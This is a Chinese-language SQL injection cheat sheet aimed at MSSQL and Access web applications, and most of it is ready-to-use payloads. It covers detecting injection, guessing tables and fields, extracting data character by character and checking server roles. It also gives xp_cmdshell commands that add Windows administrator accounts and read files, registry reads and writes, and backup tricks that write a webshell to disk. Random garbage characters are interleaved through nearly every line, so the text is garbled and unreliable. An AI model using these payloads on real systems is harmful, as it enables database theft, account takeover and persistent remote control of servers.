1.判断是否有注入;and 1=1 ;and 1=2 �";I�|\ �T
2.初步判断是否是mssql ;and user>0 LLa�72HW��
d�df#�c,SQ
3.注入参数是字符'and [查询条件] and ''=' ,mu=�#}a@}
xz��@/�^Cj
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �p6qza�� @
5<?�O S &B
5.判断数据库系统 c��iq'�fy�
G=[��=[o\
;and (select count(*) from sysobjects)>0 mssql �i2PP�V�T�
D~KEj�z!bQ
;and (select count(*) from msysobjects)>0 access �hX�vg<Rf�
?5��%0zMC�
o�Z�)\Ya�=
JWu^7}�@~=
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ^>�g7�Kg"0
|��{�K�Z<�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ,ZVC�@�P,L
-I#]#i@g�X
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ��i[�g�q8%
sj)$o94�=�
9.(1)猜字段的ascii值(access) o6��F�SSKM
l'_�P��]@*
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �L�yx \�s;
�FfDe&/�,/
(2)猜字段的ascii值(mssql) *AO^oBe�Y�
Af��zE0mBW
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 S{��v [6�5
;�ew3^i.du
10.测试权限结构(mssql) C+i�IvR�YC
F2;k�6�M@�
�sC8�C><y
8��P wobln
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- +1�K9R�\�
!��y8/�El
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- l?+67c�QLA
XJ��3 5Z+M
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- _L��?�`�C�
��i7qG5��U
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ��mN_KAl�n
�:{�iS�0qJ
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- t%<@k)hd~G
<i~�MBy.
(
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- MX=mG��foa
XO*|�P\#�^
;and 1=(select IS_MEMBER('db_owner'));-- qusX]Tst�z
3�Mvm'T:[�
E�~=`Ac,G2
:R�/szE*Ak
11.添加mssql和系统的帐户 ��@O;g�KFx
{X=gjQ���9
;exec master.dbo.sp_addlogin username;-- T.1*�32�cX
;exec master.dbo.sp_password null,username,password;-- gFJ.�
�p�
�aY^_+&&G
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- dS�7?[[pg9
D ^� mfWJS
;exec master.dbo.xp_cmdshell 'net user username password �QLq^[�>n�
w�7�.I0)MH
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- _�_}j
{Buk
I8|7�~jR�B
;exec master.dbo.xp_cmdshell 'net user username password /add';-- >680}��\S�
��S7��t�c�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- VEolyPcsg&
gm**9]k�^{
o�W:p6d���
L-�7��?��:
12.(1)遍历目录 )qGw!^��8�
e�8H�GS�T`
;create table dirs(paths varchar(100), id int) *\�?t�W]8<
eOZ0L1JM�!
;insert dirs exec master.dbo.xp_dirtree 'c:\' gNon*\a,-B
_Y7uM6H�L\
;and (select top 1 paths from dirs)>0 ;�~&F}!pQ�
K{�]!hm,[3
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) \t�LfB[S.5
/{eD##�vhP
s�N6R0Y��W
s~ZLnEb��
(2)遍历目录 `QH-VR�\�_
N�aeG2�>�1
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- x|#R$^4CY�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 JXG%C�x!2}
�\KlO��j%s
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �S�4/CL�4=
��z(s�fX}%
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �C;�#-2�^h
al�QMPQVin
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 Vdrqb�Z ��
OK{_�WTCe>
�!d@q��T�.
),#%jc2_^
13.mssql中的存储过程 <ID/\Qx`q�
�MfJ;":]O!
xp_regenumvalues 注册表根键, 子键 �&5�]&6TD6
�0n5{Wr$�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 jB+K)�NXHL
�!Cq2<[K#�
xp_regread 根键,子键,键值名 !f
7C�N�<�
�-;/;d�z;
;exec xp_regread �Lv�lVZj�T
|@{4zo�P_N
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 =Q�#}
�,T�
xgw[)!g^�\
xp_regwrite 根键,子键, 值名, 值类型, 值 �{+CW_c�e�
!(:�R=J_�h
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 W��@R\m=e2
.h!��oo�;@
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 oPSucz&�s�
{)�E)&�lL
xp_regdeletevalue 根键,子键,值名 3l���w�
KV
�~b.�C[s��
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 {q=(�x��]C
>��/,�7j:X
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 PuKT�0*_ 7
OE�z'�&))J
(9!$p|�d�*
�A��*;I}�F
14.mssql的backup创建webshell _�wMc�7`6F
��%,HuG-L
use model 84xA/BR�W�
F`�� /mcyf
create table cmd(str image); =o��g5�Mh,
x|��>N����
insert into cmd(str) values (''); gIGyY7{(s8
~s#vP<QH�a
backup database model to disk='c:\l.asp'; wR)U&da�`@
tO0M�YEx�"
A� 9���I�5
@'go?E��)f
15.mssql内置函数 99Gzh�X�_
gXrPZ|i�S�
;and (select @@version)>0 获得Windows的版本号 r�_m*$�r~f
��-��0W�s3
;and user_name()='dbo' 判断当前系统的连接用户是不是sa a: C�h"la�
�8�SV.giG;
;and (select user_name())>0 爆当前系统的连接用户 S;pKL,d>r
�l~�|x*JTq
;and (select db_name())>0 得到当前连接的数据库 �L'=m�Db�
�"
3r�yp
A
A1V��bqA��
l/(|r�l#�6
16.简洁的webshell BSe��{HmDq
j2@19YX�e@
use model /Y�� �N�V�
@�|3P�V���
create table cmd(str image); w�oQ� UrO(
1N�8:,bpsT
insert into cmd(str) values (''); dvPK�5+0W?
2n/cq��K��
backup database model to disk='g:\wwwtest\l.asp';
